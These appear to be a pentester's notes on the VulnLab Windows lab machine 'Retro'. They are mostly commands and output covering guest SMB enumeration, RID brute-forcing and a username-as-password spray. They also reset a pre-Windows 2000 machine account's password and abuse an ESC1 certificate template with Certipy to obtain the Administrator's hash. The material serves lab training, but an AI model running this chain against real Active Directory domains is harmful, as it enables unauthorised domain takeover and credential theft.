Retro
This is not a writeup, just my notes about VulnLabs machines.
Last updated
This is not a writeup, just my notes about VulnLabs machines.
Last updated
Operating System: Windows
Chain: False (standalone compromise)
trainee
trainee
Username as Password (Bruteforce userlist)
Domain User
✅ Valid Usernames
jburley
trainee
tblack
HelpDesk🔑 Passwords list
trainee# Nmap 7.94SVN scan initiated Tue Apr 1 12:18:06 2025 as: nmap -p- -A --open -T5 -Pn -n -oN ext_retro_tcp_allports -vvv --min-rate 3000 10.10.105.102
53/tcp open tcpwrapped syn-ack
88/tcp open tcpwrapped syn-ack
135/tcp open tcpwrapped syn-ack
139/tcp open tcpwrapped syn-ack
445/tcp open tcpwrapped syn-ack
3268/tcp open tcpwrapped syn-ack
3389/tcp open tcpwrapped syn-ack
49664/tcp open tcpwrapped syn-ack
49669/tcp open tcpwrapped syn-ack
49679/tcp open tcpwrapped syn-ack
49711/tcp open tcpwrapped syn-ackNot vulnerable to AXFR
Server allows null session
Server allows guest user
Not Group.xml (gpp file).
nxc smb 10.10.105.102 -u 'Intrusionz3r0' -p '' --share Trainees -M spider_plus
nxc smb 10.10.105.102 -u 'Intrusionz3r0' -p '' --share Trainees -M spider_plus -o DOWNLOAD_FLAG=TrueFile: Important.txt
--------------------------------------------------------------------------------------------
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Adminsnxc smb 10.10.105.102 -u 'dfdfsd' -p '' --rid-brute
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.105.102 445 DC [+] retro.vl\dfdfsd: (Guest)
SMB 10.10.105.102 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.10.105.102 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.10.105.102 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.10.105.102 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.10.105.102 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.10.105.102 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.10.105.102 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.10.105.102 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.105.102 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.105.102 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.10.105.102 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.105.102 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.105.102 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.105.102 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.105.102 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.10.105.102 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.10.105.102 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.105.102 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.10.105.102 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.10.105.102 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.10.105.102 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.10.105.102 445 DC 1109: RETRO\tblack (SidTypeUser)nxc smb 10.10.105.102 -u users.txt -p users.txt --no-bruteforce
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
<SNIF>
SMB 10.10.105.102 445 DC [+] retro.vl\trainee:trainee nxc smb 10.10.105.102 -u trainee -p trainee --share notes -M spider_plus -o DOWNLOAD_FLAG=TrueFile: ToDo.txt
-----------------------------------------------------------------------------------------
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
Jamescertipy-ad find -u trainee -p trainee -vulnerable -stdout -dc-ip 10.10.105.102
Certipy v4.8.2 - by Oliver Lyak (ly4k)
<SNIF>
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authenticationIn Active Directory, when administrators create computer accounts with the "Assign this computer account as a pre-Windows 2000 computer" option enabled, the system sets the account's password to the computer's name in lowercase. For example, a computer account named "Workstation1$" would have a default password of "workstation1"
nxc ldap 10.10.105.102 -u trainee -p trainee --bloodhound -c all --dns-server 10.10.105.102
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP 10.10.105.102 389 DC [+] retro.vl\trainee:trainee
LDAP 10.10.105.102 389 DC Resolved collection methods: acl, group, localadmin, container, psremote, trusts, rdp, objectprops, dcom, session
LDAP 10.10.105.102 389 DC Done in 00M 29S
LDAP 10.10.105.102 389 DC Compressing output into /home/Intrusionz3r0/.nxc/logs/DC_10.10.105.102_2025-04-01_131248_bloodhound.zip❯ nxc smb 10.10.105.102 -u BANKING$ -p banking
SMB 10.10.105.102 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.105.102 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT ❯ impacket-changepasswd retro.vl/'BANKING$':'banking'@10.10.105.102 -p rpc-samr
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password:
Retype new password:
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.certipy-ad req -u BANKING$ -p password123! -dc-ip 10.10.105.102 -ca retro-DC-CA -template RetroClients -upn Administrator -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'certipy-ad auth -dc-ip 10.10.105.102 -username Administrator -pfx administrator.pfx -domain retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
